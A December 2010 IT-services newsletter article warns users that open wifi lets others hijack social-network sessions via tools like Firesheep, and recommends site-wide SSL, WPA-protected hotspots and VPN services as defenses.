OCS banner and logo
Keeping clients' computers safe and profitable for over 25 years



Home Forms About Current Newsletter subscribe 
Search All Articles

Browse by Category


powered by pmc2m

 

More Open Wifi Problems

I've written before about how risky open wifi is. It has just become MUCH more risky. It used to be like driving blindfolded along a race track. Now it is like speeding blindfolded along the freeway. If you are using open wifi in places like Starbucks and using Facebook or Twitter or Flickr or any of about 30 other social networking type sites, then anyone in that wifi hotspot could be accessing and doing whatever they want on your site just as easily as you. They don't even need to be a hacker or have any special competence.

The Basic Problem

The main problem is that after you do your secure logon, then most of those sites transfer you to non-secure pages and transmit the session cookies they use to track you in the clear. This makes it possible for anyone sniffing traffic to get your session cookies and access your website just as if they were you. The session cookie will in fact, identify them as you.

The Immediate Threat

This has always been a problem that anyone using some hacker software could exploit. Computer security experts have long complained that the  policy of open wifi and sites that don't maintain secure connections throughout their domain are creating a big problems that could easily be corrected.

One of these experts did get angry enough to try and bring the problem to a head. Eric Butler of Seattle Washington wrote Firesheep, a Firefox extension that will allow any normal user to see everyone logged into any of about 30 different social networking sites and do just about anything on their site. In the first two weeks after its release, over 700,000 people downloaded this software. His hope is to force these sites to clean up their act and make their whole sites SSL secure.

Eric writes, "Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win. "

You may object to his solution. It may be illegal. But it is also, clearly, a game changer.

This software add-on is so popular that there is a new add-on called BlackSheep. It is designed to detect if someone on your wifi hotspot is using Firesheep. Another called SheepHerder is designed to protect you. But protecting you from one single program, while continuing to act recklessly, is not the answer.

The Vendor's Solution

Vendors should make their whole sites SSL only. They should not be broadcasting session cookies in the clear. Just like your bank and Paypal, sites should be locked down if they have private information or if people's public persona can be altered.

The Hotspot's Solution

If the Hotspots would use WPA encryption the problem would be eliminated. Even if the passwords were simple and in plain site, it would solve the problem because the router would keep each user separate. So if starbucks put a sign up saying, "We're using WPA encryption. The password is 'coffee'." Then, starbucks users would be protected from this exploit. They could even add 'our password is coffee' to their SSID so people would see it when selecting the wifi hotspot.

Your Solution

Setup your own secure channel. If you use wifi hotspots, or hotels, or airport online access to check email or do anything, then you should do so only through a secure channel.

You can do this by using Logmein (or an equivalent like Gotomypc) to login securely to your desktop computer and then browse out from there. There is even a limited free version of LogMeIn. Of course you could also login to your corporate VPN and browse through your workstation if that is available.

Another option is to use a VPN service. I recommend Witopia's Personal SSL VPN service for $59.99⁄yr. This will allow you to setup a secure connection to any of their many vpn servers all over the world and have all of your Internet access sent through a fully encrypted and safe SSL VPN. Their servers are all over the world, so it is easy to connect to one near your location.

If you have any questions or want help setting up LogMeIn or Witopia, just call.

Short Videos

A simple demonstration of Firesheep is here:www.youtube.com⁄watch?v=9T8xaDoYNmg&feature=fvw

An ABC news story on Firesheep:abclocal.go.com⁄wabc⁄video?id=7750382&rss=rss-wabc-video-7750382



Date: December 2010


Creative Commons License
This article is licensed under a Creative Commons Attribution-NoDerivs 3.0 Unported License.

 
 
  Please direct questions/suggestions about website to the webmaster